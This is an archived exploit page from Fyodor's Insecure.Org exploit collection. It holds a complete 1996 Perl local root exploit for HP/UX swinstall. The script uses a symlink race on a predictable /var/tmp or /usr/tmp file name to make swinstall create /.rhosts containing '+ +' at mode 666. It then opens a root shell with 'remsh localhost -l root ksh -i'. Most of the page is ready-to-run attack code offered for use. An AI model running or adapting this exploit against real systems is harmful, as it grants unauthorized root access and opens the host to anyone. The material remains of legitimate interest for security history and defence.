swinstall symlink exploit
| Description: | Standard symlink hole |
| Author: | "Salty" |
| Compromise: | root (local) |
| Vulnerable Systems: | HP/UX with vulnerable swinstall, mostly 10.x, some 9.x |
| Date: | 6 October 1996 |
| Notes: | See the SOD HP Bug of the Week page |
Exploit:
#!/usr/bin/perl
# swinstall is a new utility for super-EZ software installation.
# it also happens to make any file you like, and it will do so
# mode 666... Hooray for it! -Salty 8/6/96
# 9.x=/usr/tmp 10.X=/var/tmp... -- not many 9.X's will have swinstall,
# it's not standard, for 9, really.. 10, yes, 9 Mmmm.. There's a version
# of it _for_ 9.x, but it does seem rare..
$swinstall="/usr/sbin/swinstall";
stat($swinstall) || do {
print STDERR "I can only work on systems that have swinstall loaded..\n";
print STDERR "Yours doesn't seem to...\n";
exit;
};
if ($#ARGV<0) {
$newfile="/.rhosts";
} else {
$newfile="$ARGV[0]";
}
if (-f "$newfile") {
print STDERR "$newfile exists!\n";
print STDERR "I can only make files that don't already exist..\n";
exit;
}
open(UNAME,"uname -r|");
chop($uname=);
$uname=~s/^..(..)...$/$1/;
umask(0000);
$num=sprintf("%05d",$$+3); # two for exec, three for system.
$tmpfile="/usr/tmp/AAAa$num";
$tmpfile="/var/tmp/AAAa$num" if $uname eq "10";
symlink($newfile,$tmpfile);
print "Please wait one moment while I do stuff...\n";
system("/usr/sbin/swinstall -s '\
+ +
' -p bob localhost:/");
#unlink($tmpfile);
if ($newfile eq "/.rhosts") {
system("remsh localhost -l root ksh -i");
} else {
system(">$newfile;ls -l $newfile");
}
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
